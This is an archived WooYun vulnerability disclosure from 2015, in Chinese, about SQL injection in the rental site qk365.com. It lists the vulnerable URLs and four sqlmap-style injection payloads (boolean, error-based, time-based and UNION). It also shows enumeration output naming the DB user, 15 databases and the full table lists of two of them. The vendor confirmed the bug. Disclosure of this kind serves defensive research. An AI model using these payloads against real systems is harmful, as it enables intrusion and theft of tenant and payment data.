当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152186

漏洞标题:青客主站SQL注射涉及全站数据库

相关厂商:qk365.com

漏洞作者: 路人甲

提交时间:2015-11-06 11:36

修复时间:2015-12-21 19:12

公开时间:2015-12-21 19:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-16: 细节向核心白帽子及相关领域专家公开
2015-11-26: 细节向普通白帽子公开
2015-12-06: 细节向实习白帽子公开
2015-12-21: 细节向公众公开

简要描述:

.

详细说明:

1,http://www.qk365.com/news/elive/infoRight_ajax.do?channelParPagemark=1&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20   
2,
www.qk365.com/news/elive/infoRight_ajaxLink.do?classPagemark=*&num=99&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481

漏洞证明:

---
Parameter: channelParPagemark (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: channelParPagemark=1') AND 9321=9321 AND ('LoVW'='LoVW&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: channelParPagemark=1') AND (SELECT 3580 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(3580=3580,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('IeTY'='IeTY&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: channelParPagemark=1') AND (SELECT * FROM (SELECT(SLEEP(5)))CAhr) AND ('RfwH'='RfwH&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: channelParPagemark=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176716b71,0x4a616c744d4654497046704a5a59714869496f7a6e695045566a4476414c76454c575a566e696f4c,0x716b716b71),NULL,NULL,NULL,NULL-- -&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
---
back-end DBMS: MySQL 5.0
current user: 'yijia_guest@10.10.10.%'
current user is DBA: False
available databases [15]:
[*] db_wuye
[*] ecombehaviour
[*] ecomhouserent
[*] freecms
[*] freecms_sim
[*] information_schema
[*] mysql
[*] partybuilding
[*] qingke_crm
[*] quartz
[*] quartz_kq
[*] quartz_pro
[*] quartz_rpt
[*] stock
[*] test
Database: ecomhouserent
[88 tables]
+------------------------------+
| activity |
| activity_room |
| agency_clue |
| app_device_source |
| app_login_source |
| app_login_source_sync |
| area |
| base_info |
| bill_manage |
| cell_area |
| cell_area_bak |
| cell_area_copy |
| cell_photo |
| cell_photo_temp |
| collectionroom |
| comment |
| contract |
| coupon_user_list |
| customer_apply |
| customer_book |
| customer_cell |
| customer_reminder |
| customer_tenant |
| customer_tenant_copy |
| discuss |
| discuss_praise |
| drawcode_list |
| find_password |
| gift_detail |
| gift_type |
| goddess |
| hot_search_keys |
| info_notice |
| join_activity |
| landmark |
| leave_message |
| link_man |
| link_road |
| nyrecord |
| operatelog |
| owner_info |
| pay_type |
| payment |
| petty_expenses |
| petty_item |
| promotion_coupon |
| provincial |
| provincial_bak |
| push_message |
| reservation |
| review |
| road |
| room |
| room_admin |
| room_recomm |
| room_view |
| share_record |
| sig_reservation_subscription |
| subscription |
| subway |
| subway_station_code |
| t_coupons |
| t_coupons_code |
| t_feedback |
| t_mer_info |
| tmp_a |
| user_openid |
| user_openid_copy |
| v_find_booking |
| v_find_interest_rooms |
| v_find_new_rooms |
| v_find_orderform |
| v_find_reservation |
| v_find_rom_recomm |
| v_find_room_detail |
| v_find_room_friends |
| v_find_subscription |
| v_find_taobao_room_detail |
| v_rom_recomm |
| v_rom_rocomm_group |
| v_room_compara |
| v_stat_reservation |
| v_wx_double12 |
| v_wx_double12_a |
| v_wx_double12_b |
| village_ |
| vote |
| voucher |
+------------------------------+
Database: db_wuye
[54 tables]
+-----------------------------+
| account_payment_relation |
| assign_log |
| bill_common |
| bill_detail |
| bill_task_bak |
| bill_task_main |
| building_num |
| camera_link_log |
| device_upload_info |
| dict_data |
| dict_type |
| fee_cost |
| model_acitvity_log |
| notice_info |
| pass_log |
| pay_mobile_call_log |
| property_company |
| rate_info |
| region_info |
| region_info_copy |
| repair_attach |
| repair_bill_info |
| room_info |
| room_user_info |
| room_user_relation |
| sms_log |
| software_release |
| sys_auth_info |
| sys_log |
| sys_org_info |
| sys_org_staff_relation |
| sys_role_auth_relation |
| sys_role_info |
| sys_staff_info |
| sys_staff_role_relation |
| third_pay_backcall_log |
| third_payment |
| user_apply_info |
| user_audit_log |
| user_citizen |
| user_command_log |
| user_device_info |
| user_door_detail |
| user_enterprise |
| user_face_pool |
| user_info |
| user_message_read |
| user_visitor_room_info |
| user_worker_info |
| village_info |
| village_userworker_relation |
| visitor_log |
| visitor_third_log |
| wx_token_record |
+-----------------------------+

修复方案:

~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-06 19:10

厂商回复:

非常感谢,已经安排紧急修复

最新状态:

暂无